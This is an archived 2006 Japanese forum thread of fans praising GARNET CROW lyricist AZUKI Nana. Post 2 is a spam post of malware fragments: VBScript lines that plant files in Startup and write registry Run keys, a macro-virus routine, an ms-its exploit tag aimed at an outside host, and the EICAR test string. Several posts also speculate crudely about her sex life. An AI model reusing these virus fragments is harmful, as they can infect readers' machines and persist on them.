5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【小豆】AZUKI七さまに捧ぐスレ2【GARNET CROW 】

1 :通行人さん@無名タレント:2006/10/21(土) 00:31:23 ID:35Hn1Q0Z


世界最高峰の詩的美女、それがAZUKI七さまなのです。


前スレ
【小豆】AZUKI七さまに捧ぐスレ【GARNET CROW 】
http://tv7.2ch.net/test/read.cgi/geino/1135345902/

2 :<body onload=window()>:2006/10/21(土) 00:42:34 ID:ngcVaRhV
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

3 :通行人さん@無名タレント:2006/10/21(土) 08:11:00 ID:UAt+6xXr
>>1
スレ立て乙。
今スレになっても七様への愛は変わらない。
盛り上げていこう。
これからもよろしく。

4 :通行人さん@無名タレント:2006/10/21(土) 12:03:23 ID:2gPIT9pY
>>1乙。まさか続きが立つとは…

七様に

5 :通行人さん@無名タレント:2006/10/21(土) 15:00:51 ID:2gPIT9pY
合掌

6 :通行人さん@無名タレント:2006/10/21(土) 15:17:26 ID:x7LoVHU5
黙祷。

7 :通行人さん@無名タレント:2006/10/21(土) 19:02:32 ID:y8AMM2qy
7get

8 :通行人さん@無名タレント:2006/10/21(土) 19:20:50 ID:7qaTg9vE
>>3
こちらこそだ。
七さま好きな人に悪い人間はいない

9 :通行人さん@無名タレント:2006/10/21(土) 23:31:03 ID:rywjxYs3
七の所為でほとんどの女に魅力を感じなくなってしまった
罪深きナナー

10 :通行人さん@無名タレント:2006/10/22(日) 09:43:00 ID:UkMMgizL
>>9
重い病にかかってるね(´・ω・`)つエロ本

11 :通行人さん@無名タレント:2006/10/22(日) 12:09:05 ID:rwZkPuaJ
それ何てエロ本?

12 :通行人さん@無名タレント:2006/10/22(日) 21:00:42 ID:h2hbqAZh
80,0

13 :通行人さん@無名タレント:2006/10/23(月) 21:32:03 ID:WRQEcIk2
それ詩集じゃないw

14 :通行人さん@無名タレント:2006/10/23(月) 22:57:12 ID:Z5lpRiuW
短パンからスラッと伸びるの太ももが(;´Д` )ハァハァ…

15 :通行人さん@無名タレント:2006/10/24(火) 00:22:12 ID:bwLlvy2V
>>14
うpしる!!

16 :通行人さん@無名タレント:2006/10/24(火) 16:06:37 ID:xe01eG1d
晴れ時計PVのナナーはいい

17 :通行人さん@無名タレント:2006/10/24(火) 19:13:50 ID:J2j4rDC9
七様を四柱推命で診断してみたんだが・・・・・・・・・
恐ろしく暗く強烈な個性・・・・・・・・・・・・・・
おそらく怖い人なのだが・・・・・・・・・・・・・
俺は七様を支え続ける勇気があるw
容姿がタイプであるのは否定できないが、
なりより七様の才能に惚れた。


18 :通行人さん@無名タレント:2006/10/25(水) 17:43:50 ID:sXisdj4D
キーボードの腕前は微妙だがなwww
コメント逝っちゃってて怖い怖い。

19 :通行人さん@無名タレント:2006/10/25(水) 18:26:20 ID:6PHXqzvA
ヒント:7様はキロン

20 :通行人さん@無名タレント:2006/10/25(水) 18:27:57 ID:6PHXqzvA
, , , , , ,         __ ___` 、
,//////ィ                 ヽ.
ノノノノノノノl    /\        , -、 !
///////l   ",二ヽ.二_ヽ.  l  lノ_へノ!
//////ノ       (_jリ ゙T`’ノ / (rリ`y゙
ソ´,-、\|   -` ー--‐ "  __{ ー-'{
| ,f^ソ |____/ ゙̄ヾ"´  \^ヽ. |
| に(        l    j ,..   ヽ |.|
\` ' j       `ー-‐' イ_ `  ノ'" i      当たり前だ、馬鹿もん!
  ゙‐-'        /,. ‐-、/TTT||  ノ
   _}       / |----二ニフ ノ
  人\ ヽ.        ! r'二ヽ / /
_「  \\ `  、   ` ̄ ̄/
     \\        Ti"


21 :通行人さん@無名タレント:2006/10/25(水) 18:29:33 ID:6PHXqzvA
, , , , , ,         __ ___` 、
,//////ィ                 ヽ.
ノノノノノノノl    /\        , -、 !
///////l   ",二ヽ.二_ヽ.  l  lノ_へノ!
//////ノ       (_jリ ゙T`’ノ / (rリ`y゙
ソ´,-、\|   -` ー--‐ "  __{ ー-'{
| ,f^ソ |____/ ゙̄ヾ"´  \^ヽ. |
| に(        l    j ,..   ヽ |.|
\` ' j       `ー-‐' イ_ `  ノ'" i      7様は神としか結婚せん!!!
  ゙‐-'        /,. ‐-、/TTT||  ノ
   _}       / |----二ニフ ノ
  人\ ヽ.        ! r'二ヽ / /
_「  \\ `  、   ` ̄ ̄/
     \\        Ti"


22 :通行人さん@無名タレント:2006/10/25(水) 18:31:55 ID:6PHXqzvA
, , , , , ,         __ ___` 、
,//////ィ                 ヽ.
ノノノノノノノl    /\        , -、 !
///////l   ",二ヽ.二_ヽ.  l  lノ_へノ!
//////ノ       (_jリ ゙T`’ノ / (rリ`y゙
ソ´,-、\|   -` ー--‐ "  __{ ー-'{
| ,f^ソ |____/ ゙̄ヾ"´  \^ヽ. |
| に(        l    j ,..   ヽ |.|
\` ' j       `ー-‐' イ_ `  ノ'" i      7様が欲しいなら神なれ!!!
  ゙‐-'        /,. ‐-、/TTT||  ノ
   _}       / |----二ニフ ノ
  人\ ヽ.        ! r'二ヽ / /
_「  \\ `  、   ` ̄ ̄/
     \\        Ti"


23 :通行人さん@無名タレント:2006/10/25(水) 18:39:00 ID:6PHXqzvA
, , , , , ,         __ ___` 、
,//////ィ                 ヽ.
ノノノノノノノl    /\        , -、 !
///////l   ",二ヽ.二_ヽ.  l  lノ_へノ!
//////ノ       (_jリ ゙T`’ノ / (rリ`y゙
ソ´,-、\|   -` ー--‐ "  __{ ー-'{
| ,f^ソ |____/ ゙̄ヾ"´  \^ヽ. |
| に(        l    j ,..   ヽ |.|
\` ' j       `ー-‐' イ_ `  ノ'" i      >>18は陰湿だ!もう少し明るくなれ!
  ゙‐-'        /,. ‐-、/TTT||  ノ
   _}       / |----二ニフ ノ
  人\ ヽ.        ! r'二ヽ / /
_「  \\ `  、   ` ̄ ̄/
     \\        Ti"


24 :通行人さん@無名タレント:2006/10/26(木) 23:10:08 ID:/NUjvGjl
ナナーてディープキッチュのレギュラーだったの?
それともゲストで一回出ただけ?

25 :通行人さん@無名タレント:2006/10/28(土) 11:12:57 ID:5SxmSLAi
>>24
多分ネットで調べた方が早いだろうな
ここあんまコアなファンいないから(´・ω・`)

26 :通行人さん@無名タレント:2006/10/29(日) 23:58:19 ID:ba5ZHqOO
七は神

27 :通行人さん@無名タレント:2006/10/30(月) 03:46:57 ID:OQV7VMlu
歳を取るごとに神

28 :通行人さん@無名タレント:2006/10/30(月) 22:31:28 ID:U1aPq2ae
もう女神でいいな

29 :通行人さん@無名タレント:2006/10/31(火) 01:02:13 ID:ZvNgvr3D
Z様は黒木瞳を超える上玉!
ただ、酒を断つことが条件になるがw
精神的美しさがZ様の美を保っている。

よって、美を保っている間は神!!!!!

30 :通行人さん@無名タレント:2006/10/31(火) 01:46:34 ID:ZvNgvr3D
初めてZ様を見たとき、なんでここに「本庄まなみ」がいるんだ
思ったんだよw よ〜くみたら違うことに気がつき、うわっ目が死んでいるw
と思って注目するようになった。でも来年34歳だよな。。。。。。。。
だが、俺はZ様を神聖化し神と崇める事にはなんの問題なし。
Z様が、もし俺に直接にキリスト信者になりなさいと言ってきたら、
ひょっとするとなるかもしれんw

31 :通行人さん@無名タレント:2006/10/31(火) 02:20:46 ID:ztFTuzqc
>>30
目が死んでるって・・・キラキラしてるやん。
どこか死んでる感じはあんだけどww

32 :通行人さん@無名タレント:2006/10/31(火) 20:46:18 ID:ZvNgvr3D
>>31
キラキラってw
まあ、目が死んでいるけど美しいことには変わりはないよw


33 :通行人さん@無名タレント:2006/10/31(火) 21:22:28 ID:o5ozllFJ
目死んでねーつーの!プンプン(~ヘ~;)

34 :通行人さん@無名タレント:2006/10/31(火) 22:17:03 ID:OedGpTq4
笑い顔がギコチナイ

35 :通行人さん@無名タレント:2006/10/31(火) 23:55:57 ID:ztFTuzqc
誰かオレの奈々の画像うp

36 :通行人さん@無名タレント:2006/11/01(水) 00:00:55 ID:ZvNgvr3D
>>35
ttp://www.fortunecafe.net/uranai.html

とりあえず、Z様との相性しらべてみな。
80%超えるならたいしたもんだ。

37 :通行人さん@無名タレント:2006/11/01(水) 00:23:30 ID:Fk9ePhJB
ttp://www9.ocn.ne.jp/~cebu/

ここも薦める。

俺はZ様と総合で相性が68%だったぞw

やはりZ様の波長が俺を引き込んだだろうな。


38 :通行人さん@無名タレント:2006/11/01(水) 02:23:22 ID:Ib8u6Nr1
>>56>>57
ま…まあ来年占っておくよ
画像くれくれくれ

39 :通行人さん@無名タレント:2006/11/02(木) 10:55:13 ID:WRnaEnl/
七様はチェスをやっているみたいだが、
将棋にしてくれないかw
将棋なら教えれるくらい強いほうだから、
七様の思考力増強にお役に立てると思いますw

40 :通行人さん@無名タレント:2006/11/02(木) 12:49:21 ID:WRnaEnl/
七様は小倉優子と本庄まなみを足して5で割った感じっぽいなw

優子リンの不思議系と本庄まなみの癒し系がミックスされている感じだ。

不思議系が入っているということは・・・・・・・・・・・・・

これは普通の人では対応できないことを意味している・・・・・・・・

ということで普通で七様命の人 乙。

41 :通行人さん@無名タレント:2006/11/02(木) 12:52:33 ID:+EWYdooj
5で割ったら人じゃないしw

42 :通行人さん@無名タレント:2006/11/02(木) 20:54:40 ID:swRSEKGI
朝が来るたび七の事を思う

43 :通行人さん@無名タレント:2006/11/02(木) 20:58:02 ID:+EWYdooj
七という光浴びて呼吸した

44 :通行人さん@無名タレント:2006/11/02(木) 21:55:37 ID:WRnaEnl/
>>41
>5で割ったら人じゃないしw

これを忘れているな

「七様は神」

既に人ではないのだw
_________________________________

七様は美しいが、美しいが故に人並みの幸福を得ることが困難である
ということなのだ。七様は裕福な者と一緒になり経済的には、
幸福を得ることが可能なのだが、本当に幸せであるかは疑問を感じて
いるわけで、そこに精神の深みを感じるわけである。普通の美女なら
33歳になる前に裕福な者と一緒になっているだろう。
だが彼女は自力で大金を稼ぎ、経済的に困ることから脱却しているのである。
そうなってくると、彼女が男に求めるものは裕福であるだけでは、満足しない
可能性が非常に高く、ハードルが高いものになっていると思われるのだ。
おそらく、彼女の選考基準は精神レベルの高さが基準になっているのではないか
と思われるのだ。彼女は女では珍しく哲学者気質を持っているのだが、
男にも同気質を求めている可能性がある。




45 :通行人さん@無名タレント:2006/11/02(木) 21:58:06 ID:9bxGs/F6
入信します!!!

46 :通行人さん@無名タレント:2006/11/03(金) 08:42:00 ID:xhea6/Fd
入会費一億万円

47 :通行人さん@無名タレント:2006/11/03(金) 12:22:49 ID:UiB5SCfq
安い!!!!

48 :通行人さん@無名タレント:2006/11/03(金) 19:59:21 ID:tljMhSKd
あずあず大ちきーっ!

49 :通行人さん@無名タレント:2006/11/04(土) 14:55:46 ID:FKaOuypj
本スレに七がピアスあけてたって情報があったがマジ?
画像もってたらうpしてくれ頼む
七はそういうのとは無縁だと思ってた
幻滅はしないがな

50 :通行人さん@無名タレント:2006/11/04(土) 16:15:28 ID:54Q+FdWd
つまり処女失っちゃったわけね(^ω^;)

51 :通行人さん@無名タレント:2006/11/04(土) 17:19:48 ID:5SjfF7gL
ピアスは若木の至りだw

俺は最初から処女だとは思ってなかったぞw
というより、七様の今が大事だ!!!!
今が健全であれば問題なし!!!


52 :通行人さん@無名タレント:2006/11/05(日) 19:02:48 ID:iuQ927U/
七様は今日はどんな日を過ごしたのだろう。
七様、愛しいよ〜

53 :通行人さん@無名タレント:2006/11/06(月) 05:57:50 ID:lg0WLM7P
三十代の人に萌え狂ってるのって初めてかも…(´・ω・`)

54 :通行人さん@無名タレント:2006/11/06(月) 11:27:08 ID:xjQ7XGgF
残念だな、7様はスーパーベビー級の個人主義者だぞ。。。。。
しかも意志も強いときているし、意識も高い。

まじでな7様、一次元上にいるんだよ、だから同次元に
到達していないと魅力を感じないのだ。

だかた俺らは見守ることしかできねーんだよw



55 :通行人さん@無名タレント:2006/11/06(月) 20:56:03 ID:YyoN2siy
ベビー級かよw

56 :通行人さん@無名タレント:2006/11/07(火) 06:50:16 ID:6GRVjY4C
バーブー!

57 :通行人さん@無名タレント:2006/11/07(火) 09:26:41 ID:oK1H8GKC
達観して冷たそうだ
そういう女はだいたいMだったりするんじゃなかろうか?

58 :通行人さん@無名タレント:2006/11/07(火) 13:03:49 ID:BPS8l5c9
逆だよw 七様はSだw
そのSは親しい者にしか出さないだろうがなw

七様の涼しい顔に騙されていけないぞw
ありえないが、もし付き合うことができたならば、
そりゃ忍耐の日々が続くと確信しているw
 
だから、一般人の人にはお勧めできないし、
現に33歳独身というは、そのSが原因だったり
するんだと思う。

ありえんが、Mの俺ならSの七様の攻撃に耐えることができるw
まあ、ありえんw

59 :通行人さん@無名タレント:2006/11/07(火) 14:10:08 ID:Zb9YxeDF
Sって男には辛いなあ
若ければまだいいが、30でそれだと忍耐の日々になりそうだZe('A`)いやン

60 :通行人さん@無名タレント:2006/11/07(火) 23:53:29 ID:QFtylIAO
もう男に興味ないんじゃないのかなぁ

61 :通行人さん@無名タレント:2006/11/08(水) 01:32:24 ID:uzVymoH7
あの年代ってぶっちゃけると性欲が服着て歩いてるようなもんだと思うぜ

62 :通行人さん@無名タレント:2006/11/08(水) 10:43:21 ID:2LphI9DM
竹井詩織里 new single
「Like a little Love」
作詞:AZUKI 七(GARNET CROW)
作曲:徳永暁人(doa)
編曲:小林哲

本日発売
GIZA studio

63 :通行人さん@無名タレント:2006/11/08(水) 13:18:46 ID:uzVymoH7
>>62
なにこの売れなそうなタイトル…

64 :通行人さん@無名タレント:2006/11/08(水) 13:56:52 ID:uzVymoH7
公式で試聴したv
悪くないが若い子に変な道徳観を歌わせてる〜ような印象がある
全部聞いてないから分からないけどさぁ

65 :通行人さん@無名タレント:2006/11/08(水) 15:02:04 ID:aOQns74j
七様はGARNET CROWファン向きなんです。

66 :通行人さん@無名タレント:2006/11/08(水) 17:11:23 ID:2LphI9DM
>>63
>>64
買ったほうがいいでしょう。

67 :通行人さん@無名タレント:2006/11/08(水) 21:07:28 ID:uzVymoH7
>>66
ねえさんが唄ってなきゃ買わない

68 :通行人さん@無名タレント:2006/11/09(木) 12:42:41 ID:9UgLlzGR
竹井詩織里「Like a little Love」
作詞:AZUKI 七(GARNET CROW)
作曲:徳永暁人(doa)
編曲:小林哲

now on sale
GIZA studio
オリコンデイリー初登場31位

69 :通行人さん@無名タレント:2006/11/10(金) 12:06:57 ID:q8P2wUAE
アルジェリア、エジプト、モロッコ、チュニジア、
アラブ首長国連邦、サウジアラビアのアラブ六カ国が核開発を宣言しました。

やべ〜マジで核戦争が起きそうだ。
七様を安全な所に導かなくてはいけないぞ。

ガーネット聴いてる場合じゃなくなったぜ。。。。。

とにかく七様を死なせてはいけない。

俺達の希望なのだから!

70 :通行人さん@無名タレント:2006/11/10(金) 17:35:41 ID:eaxwLHbv
ナナーは死を受け入れるんじゃない?
というかそこまで死にたくない!って気持ちは強くないんじゃないかなぁ

71 :通行人さん@無名タレント:2006/11/10(金) 18:48:01 ID:zv7RU10s
俺は七様の核シェルターになるよ

72 :通行人さん@無名タレント:2006/11/11(土) 04:58:17 ID:UdlydDdG
>>70
そうかもしれんが、生きてもらわんと困るぞい。。。

>>71
俺が作る「木製の手作り核シェルター」で七様を命をお守りしますw

73 :通行人さん@無名タレント:2006/11/11(土) 14:12:52 ID:fVFSodvq
くっそーなんか乗り遅れた気分だ。・゚・(ノД`)・゚・。

74 :通行人さん@無名タレント:2006/11/12(日) 12:20:31 ID:ayH/J3lc
AZUKI77まであと…3

75 :通行人さん@無名タレント:2006/11/12(日) 18:18:03 ID:TN9YHhU1
次スレはピンサロ板に立ててくれ

76 :通行人さん@無名タレント:2006/11/12(日) 20:20:16 ID:ayH/J3lc
次はAZUKI77

77 :通行人さん@無名タレント:2006/11/12(日) 20:21:43 ID:ayH/J3lc
AZUKI77

78 :通行人さん@無名タレント:2006/11/12(日) 20:26:08 ID:ayH/J3lc
七様おやすみなさいませ。

79 :通行人さん@無名タレント:2006/11/12(日) 20:29:54 ID:ayH/J3lc
明日も七様を想い生きていきます。

80 :通行人さん@無名タレント:2006/11/12(日) 23:46:34 ID:9dxgzbfE
ガーネットタイム復活しねーかな(´・ω・`)

81 :通行人さん@無名タレント:2006/11/13(月) 10:35:35 ID:O5I6x/5l
竹井詩織里「Like a little Love」
作詞:AZUKI 七
作曲:徳永暁人
編曲:小林哲
c/w「あたたかな冬の日」「流星」
now on sale
GIZA studio
モー娘。「歩いてる」より売れて欲しいシングルです。

82 :通行人さん@無名タレント:2006/11/15(水) 22:20:20 ID:uVu6hT/l
七がこのスレに関心をもったようです⊂二二二( ^ω^)二⊃だお

83 :通行人さん@無名タレント:2006/11/16(木) 21:44:55 ID:9pHcxSL2
最近GARNET CROWにハマリました。
良いメロディですね。(・∀・)

84 :通行人さん@無名タレント:2006/11/17(金) 12:42:58 ID:sPYqT7xn
Holy groundと夢見たあとでとスパイラルは聴いとくべき

85 :通行人さん@無名タレント:2006/11/17(金) 12:51:22 ID:yAMNwdjk
GARNET CROWのある、良い着うたサイト有りますか?
なかなか無くて。
(´・ω・`)

86 :通行人さん@無名タレント:2006/11/17(金) 13:14:07 ID:dZqzg/d4
タダで教えろとは君も世の中が分かってないね

87 :通行人さん@無名タレント:2006/11/17(金) 16:03:45 ID:sPYqT7xn
つGIZA MUSIC NET

88 :通行人さん@無名タレント:2006/11/17(金) 22:25:05 ID:gwKm4PO3
みんな七が好きだお( ^ω^)
大好きなんだお

89 :通行人さん@無名タレント:2006/11/20(月) 20:01:09 ID:CGkCzU6k
七をこちらの世界に留めている物は何だろう。
全ては消え去ると悟った彼女から見た世界は一体どんなもの?

90 :通行人さん@無名タレント:2006/11/20(月) 20:26:43 ID:CHJra9iN
肉体と精神体の分離が可能なことを知ったのだろうとおもう。
幽体離脱という経験をしたことがないだろうか?
この体験をすると、肉体と精神体が重なっていることが解る
ようになる。ようは肉体は3次元の世界で必要なもので、
精神体は3次元より自由な行動をすることができる。

あくまで俺の推測だが、七様は3次元の制約と取っ払って(死)、
より自由な精神だけの世界に憧れや、もしくはそこに行こうと
考えているのではないかと思うのだ。

七様は宗教や精神世界の素養が豊富であり、そのへんを曖昧にして、
詩にして表現していることが垣間見られる。

91 :通行人さん@無名タレント:2006/11/20(月) 23:39:41 ID:0KvOBxK8
泣け泣かのPVで七がしてたヘッドフォンて何?

92 :桜葵:2006/11/21(火) 03:08:21 ID:PHMxgK3Z
初めまして。

何だか楽しそうだったので、ご挨拶だけでもと思いまして。。

トワイライトの中で、皆さんの好きな曲って何ですか?

一押しは「マージナルマン」で

この曲って、七様が自分をモチーフにした部分が多少あるのかもなんて思いました。

皆さんはどう思いますか?

93 :通行人さん@無名タレント:2006/11/22(水) 00:19:40 ID:sIUwAoY3
マージナルマンは確かに自分がモチーフかな、と
思うところは所々あるよーな。

てか七はどの分野にどれ位の知識があるんだろ
宗教や哲学にはある程度造詣があるっぽいな
恋愛もねw

94 :通行人さん@無名タレント:2006/11/23(木) 18:23:53 ID:PiPXzJnS
ひまわりって明るいイメージなのに七様だとあんなに切なくなるんだろう?

95 :通行人さん@無名タレント:2006/11/24(金) 02:22:32 ID:hVwMCVL4
ぶーん⊂二二二( ^ω^)二⊃

96 :みぞかみもっとひで:2006/11/26(日) 16:49:57 ID:MUaWjkGD
Rusty Railはさいこーだな。
もうすてきすぎて耳がたえられんな。

97 :通行人さん@無名タレント:2006/11/27(月) 12:51:10 ID:VIbT18NP
ななさま

98 :通行人さん@無名タレント:2006/11/27(月) 15:24:10 ID:hEGOlZZV
糞女が蔓延っている現代に、七様は別格の貴女だな。
寄生虫ばっかの糞女と比べて、精神レベルが高く
男の本質的な部分を見ているような気がしてならない。

俺は七様を最高の異性として設定し、彼女のような人を
求めていく。それが非現実であろうともw



99 :通行人さん@無名タレント:2006/11/27(月) 15:32:52 ID:hEGOlZZV
世の中に物質的人間と精神的人間があるとすると、
七様は100%精神的人間であると断言できる。

七様は独身を宣言しているが、それは周りには物質的人間しか
おらず、同質の存在に出会ったことがないのが原因になっていると
思われるのだ。

あの決意に満ちた目と平行して、ものすごく悲しそうな目をしている。
このような目をしている女性を俺は見たことが無い。
七様は、精神の深いところで生きていることが俺にはわかるのだが、
これを理解できる者は、おそらく周りにはいない。

この孤独感は半端ではないと思われるが、彼女はそれに耐えている。
それを感じる俺は、彼女に対する同情心みたいなものが吹き上げてきた
わけだが、これはどうすることもできないことである為、見守ること
しかできない。

ただ、あまり自分を追い詰めないで気楽に生きて欲しい。
あと酒はほどほどにして、体に気をつけて欲しいw


100 :通行人さん@無名タレント:2006/11/28(火) 03:15:03 ID:HcOTBsAz
七さんは幸せだよ。
表現の場をもっている
ゆりっぺという最高のパートナーがいる。
誰かいないとダメなんで男と別れると、
すぐに他の誰かを探し出す。
すごく恵まれた人。幸せそうな顔してる。

101 :通行人さん@無名タレント:2006/11/28(火) 11:11:07 ID:PbOnWf0+
幸せそうな顔っていえばもちじゃまいか?

102 :通行人さん@無名タレント:2006/11/28(火) 21:38:28 ID:pmCCLz57
>誰かいないとダメなんで男と別れると、
>すぐに他の誰かを探し出す。
>すごく恵まれた人。幸せそうな顔してる。

密かに、七様を陥れようとしているのではないかと思ってしまうw
これじゃ、普通の恋愛体質の女と変わらないではないか。。。。。。
これが事実なら、クリスチャンでも神でもなんでもないような。。。。


103 :通行人さん@無名タレント:2006/11/28(火) 22:58:50 ID:BHdIadRW
>>100はちょっと的外れじゃね

104 :通行人さん@無名タレント:2006/11/29(水) 00:56:04 ID:U9m6qUWh
七さんは普通の恋愛求めてる普通の女性ですよ
夕食の材料、彼と一緒に買いに行ったり
ああいう詞を書く人ほど人間臭いものです


105 :通行人さん@無名タレント:2006/11/29(水) 01:10:02 ID:arV6+h76
>>99
独身宣言って何のこと?
いつ言ってたの!?

106 :通行人さん@無名タレント:2006/11/29(水) 06:37:42 ID:/VBhehSg
独身宣言って?

107 :通行人さん@無名タレント:2006/11/29(水) 06:57:18 ID:2k5mpauR
キリストとかそういう関係の学校通ってたんだっけ?
まだ30そこそこで独身宣言とは寂しいな

108 :通行人さん@無名タレント:2006/11/30(木) 00:00:00 ID:5nNojV1k
ヴィトゲンシュタイン見てる人が普通とは思えないw

109 :通行人さん@無名タレント:2006/12/01(金) 20:11:04 ID:IiZPrGj1
かわいいお⊂二二二( ^ω^)二⊃

110 :通行人さん@無名タレント:2006/12/01(金) 23:31:49 ID:PEpQpXro
A crownってアップテンポの曲だけど、歌詞読んでると何か切なくなるよな…

時々夢中でわたしを抱いて
必要だと思わせて安らぐから

特にこの部分が一番好きだ。 ものすごい深いと思う。

111 :通行人さん@無名タレント:2006/12/02(土) 11:40:53 ID:KvsZsruO
ゆりっぺが歌ってても七様を抱きたくなる

112 :通行人さん@無名タレント:2006/12/02(土) 11:47:12 ID:Q/+ujfwP
>>111
性的な意味合いで七様を見ている状態では、本当なファンとはいえんぞw


113 :通行人さん@無名タレント:2006/12/02(土) 14:10:09 ID:+qUSLm8b
七さんはやっぱり宗教系なのかw仏教とかも好きだよね。

114 :通行人さん@無名タレント:2006/12/03(日) 13:25:51 ID:Sqk9hMMV
七様(;´Д`)ハァハァ 抱きしめたい。
強く強く包み込むように
離さない
もう離さない
明日が来るまで離さない
僕の想いが七様の詩に届きますように

七love

115 :通行人さん@無名タレント:2006/12/03(日) 22:13:25 ID:NmbNelGp
>>114
ライブで7〜7〜と騒いでいた人じゃないだろうなw

あれは7様、困惑していたぞw

116 :通行人さん@無名タレント:2006/12/04(月) 01:18:58 ID:ZvtQP00J
七さんってなんで結婚しないんだろ?キレイな人なのにもったいない。

117 :通行人さん@無名タレント:2006/12/04(月) 12:17:39 ID:FSRLOz+2
七様は今の世界で生きていく事と引き換えに、結婚という一つの幸福を
捨てた。これは宗教やっている者にしかわからない精神構造の一つ。
俗世界の感覚で七様を捉えると摩訶不思議に見えるのは当然である。

ようは何かを得るためには、何かを失うことを理解している人なんだ。


118 :通行人さん@無名タレント:2006/12/04(月) 12:21:43 ID:FSRLOz+2
逆に33歳で魅力的であり続けているということは、その結婚しないという
犠牲の下に成り立っている思っていいかもしれない。

ただ、7様も神が選んだ相手が目の前に登場した場合、その価値は吹っ飛ぶ。
彼女はその感覚を持っているから、当然に普通の男は相手にしない。

119 :通行人さん@無名タレント:2006/12/04(月) 14:36:41 ID:ZvtQP00J
素晴らしい七様の精神構造。七様普通にそこらへんの母親と変わらないのに隠し子いそうw

120 :通行人さん@無名タレント:2006/12/04(月) 20:34:43 ID:yq32bDLB
ライブだと生暖かく見守ってるぞ。
七様の気持ちを察しての行動だ。






でも、マジ抱きたい(;´Д`)

121 :通行人さん@無名タレント:2006/12/04(月) 21:43:28 ID:dukkQh9e
宗教と言うか哲学なんじゃないの?
宗教は少し違う気が。

122 :通行人さん@無名タレント:2006/12/04(月) 23:15:27 ID:yq32bDLB
そんなんどうだっていい。









それより強く抱きたい

123 :通行人さん@無名タレント:2006/12/04(月) 23:31:06 ID:ZvtQP00J
七さんみたいな人いいなぁ!ぜったい30代であのスタイル維持はできない。古井さんといくつ年離れてるの?

124 :通行人さん@無名タレント:2006/12/05(火) 01:29:04 ID:D+SjQG5S
僕ななっぺ結婚しちゃったら・・・死ぬ。
そんな人は多いと思う。

125 :通行人さん@無名タレント:2006/12/05(火) 15:43:34 ID:j1yEwaRF
乳首黒そう

126 :通行人さん@無名タレント:2006/12/05(火) 16:44:22 ID:o3m0XeSL
死ぬなww七さんは普通であってほしいです。

127 :通行人さん@無名タレント:2006/12/06(水) 01:00:10 ID:rXW/R9At
七様は普通じゃないぞw
性格はドライで苛烈だw
しかも起伏も激しいしなw

ただ、そんな七様が俺は好きなんだw
破天荒で型破りの七様の性格が好きなんだ。

あとな七様が理想としているパートナー像は
友達恋人だぞ。

それは間違いが無い。


128 :通行人さん@無名タレント:2006/12/06(水) 01:49:22 ID:lz6ivsB2
七さんいいねo(^-^)o


129 :通行人さん@無名タレント:2006/12/07(木) 00:06:29 ID:AYkLdIYr
ライブ逝った奴はいいなぁ

130 :通行人さん@無名タレント:2006/12/07(木) 00:19:27 ID:zewfcyrW
そうだよね〜七さんどんなだったんだろw

131 :通行人さん@無名タレント:2006/12/07(木) 03:13:42 ID:bliUIH61
来年は七様が飛躍活躍跳躍しますように。

132 :通行人さん@無名タレント:2006/12/07(木) 15:28:24 ID:zewfcyrW
2007年七ナイトを7月7日にすべきww

133 :通行人さん@無名タレント:2006/12/07(木) 19:25:48 ID:E3El+9Sj
七様は女の中ではマジで最高ランクに属する。

だから、男も最高ランクでないと相手にされない。

最高ランクをどこで判断しているかというと、

人間のレベルが1次元上にあるんだ。

どこみてそれがわかったかというと、

俺は精神ステージが感受性でわかったりするんだ。

彼女はとにかく、青くて美しい。

この意味わかるかな?

134 :通行人さん@無名タレント:2006/12/07(木) 19:28:30 ID:E3El+9Sj
彼女は女では珍しく、青のオーラに包まれている。
青は論理的な色といわれているのだが、このオーラに
包まれているということは相当な知的水準に達している
いるということなんだ。



135 :通行人さん@無名タレント:2006/12/07(木) 21:07:04 ID:zewfcyrW
人間じゃない〜神に値するじゃんwwすべてが最高レベルね。
青い…なんとなく分かるかも。

136 :通行人さん@無名タレント:2006/12/07(木) 23:30:35 ID:XXKEE4VM
ライブのカレンダーの2月の写真の美しさは異常。
とうみても17歳です。

137 :通行人さん@無名タレント:2006/12/07(木) 23:41:16 ID:AYkLdIYr
一回七様の講演というか、あっち系の話してもらいたい
死生、宗教、哲学、その他諸々。

138 :通行人さん@無名タレント:2006/12/07(木) 23:55:07 ID:zewfcyrW
聞きたい。一回七さんの頭ん中見てみたい。
宗教とか語ったらおもしろそうw七さんの影響で好きになったものってある?

139 :通行人さん@無名タレント:2006/12/08(金) 00:53:16 ID:HEmwpSxg
七様はオカルト板と宗教版の常連だな。
七様の美しさは、知的なだけではなく宗教性というか
精神の高さが際立っていると、いった感じだとおもう。

メインのオーラがブルーで補助的にグリーンそしてイエローも見える。

140 :通行人さん@無名タレント:2006/12/08(金) 00:55:35 ID:HEmwpSxg
性格は女ではなく、限りなく男に近いと思う。
見た目とは正反対な為、驚くと思うな。



141 :通行人さん@無名タレント:2006/12/08(金) 08:05:50 ID:XqLS91Iz
たぶんwなんか男っぽいとこが好きだしw
七さんは男女七さんだな。わけわからん。
宗教とかやってるのかな?むしろ七さん教でw

142 :通行人さん@無名タレント:2006/12/08(金) 12:04:59 ID:YFK94ZQf
抱きたい

143 :通行人さん@無名タレント:2006/12/08(金) 22:56:17 ID:JEomw34d
